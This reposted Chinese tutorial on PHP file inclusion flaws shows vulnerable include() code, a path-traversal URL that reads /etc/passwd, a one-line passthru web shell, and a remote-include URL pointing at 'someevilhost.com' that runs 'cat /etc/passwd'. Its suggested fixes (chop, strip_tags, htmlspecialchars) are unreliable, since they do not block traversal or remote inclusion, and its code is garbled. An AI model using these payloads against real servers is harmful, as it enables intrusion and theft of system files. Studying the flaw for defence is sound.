文件包含漏洞防護(hù)以及常見文件讀取payload的示例分析

這篇文章主要介紹文件包含漏洞防護(hù)以及常見文件讀取payload的示例分析,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

創(chuàng)新互聯(lián)長(zhǎng)期為近1000家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為萬源企業(yè)提供專業(yè)的成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營(yíng)銷網(wǎng)站建設(shè)萬源網(wǎng)站改版等技術(shù)服務(wù)。擁有十余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。

僅供參考學(xué)習(xí)使用

一、安全示例

現(xiàn)在請(qǐng)看下面的代碼

<a href=index.php?page=file1.php> Files </a>
<? Php
$page = $ _GET [page];
include ($ page);
?>

這里顯然不應(yīng)該使用它。$page變量并未完全清除。 $page輸入直接定向到網(wǎng)頁,這是一個(gè)很大錯(cuò)誤。這里刪除通過瀏覽器傳遞的所有輸入。當(dāng)用戶在訪問網(wǎng)頁時(shí)單擊“文件”訪問到“ files.php”時(shí),將出現(xiàn)下面的內(nèi)容。

http://localhost/index.php?page=files.php

現(xiàn)在,如果沒有一個(gè)清理輸入中變量$page,我們可以利用它執(zhí)行我們的命令。如果主機(jī)在Unix/Linux服務(wù)器,我們可以讀取用戶密碼,如下面的url所示。

http://localhost/index.php?page=.. /../../../../../etc/passwd

上面的url會(huì)返回/etc/passwd

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

現(xiàn)在假設(shè)我們輸入的url如下

http://localhost/index.php?page=http://google.com/

可能是$ page變量最初放置在頁面上的位置,我們得到了google.com主頁。我們都知道c99(shell)可以做什么,并且如果編碼人員注意的話,它們可能會(huì)包含在頁面中,從而允許用戶在瀏覽敏感文件。讓我們看一下網(wǎng)頁上可能發(fā)生的一些更簡(jiǎn)單的事情?,F(xiàn)在,我們創(chuàng)建一個(gè)名為“ test.php”的文件,并將以下代碼放入其中,然后保存。

<? Php
passthru ($ _ GET [cmd]);
?>

我們可以利用此文件來利用它, PHP中的passthru()函數(shù)是非常危險(xiǎn)的。使用test.php中的這段代碼,我們可以向網(wǎng)頁發(fā)送請(qǐng)求,包括文件包含漏洞。如以下url所示

http://localhost/index.php?page=http: //someevilhost.com/test.php

當(dāng)代碼使用$_GET請(qǐng)求,我們必須提供一個(gè)參數(shù)傳遞給passthru(). 我們可以在url中這樣輸入。

http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd

這unix機(jī)器也將提取的文件/etc/passwd使用的cat的命令?,F(xiàn)在我們需要知道如何控制它,使任何人都不可能執(zhí)行命令,和如何包括遠(yuǎn)程執(zhí)行你的服務(wù)器命令。 我們可以禁止passthru()函數(shù)。正如前文所述我們可以清除輸入。我們這里可以在函數(shù)中使用一些PHP建議的結(jié)構(gòu)。最初,perl的chop()函數(shù)適應(yīng)了PHP,該P(yáng)HP從數(shù)組中刪除了空格。我們可以這樣使用它。

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>

php中有許多函數(shù)可以清除字符串,如htmlspecialchars()htmlentities(),stripslashes()等。我們可以在PHP中執(zhí)行一個(gè)可以為所有內(nèi)容的函數(shù)。如下面代碼所示

<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>

這里還可以使用str_replace()函數(shù),并且還有很多其他函數(shù)可以清除它們。

以上是“文件包含漏洞防護(hù)以及常見文件讀取payload的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對(duì)大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!

文章題目:文件包含漏洞防護(hù)以及常見文件讀取payload的示例分析
本文URL:http://muchs.cn/article30/jpidso.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站建設(shè)、軟件開發(fā)企業(yè)網(wǎng)站制作、微信小程序、外貿(mào)建站、虛擬主機(jī)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

手機(jī)網(wǎng)站建設(shè)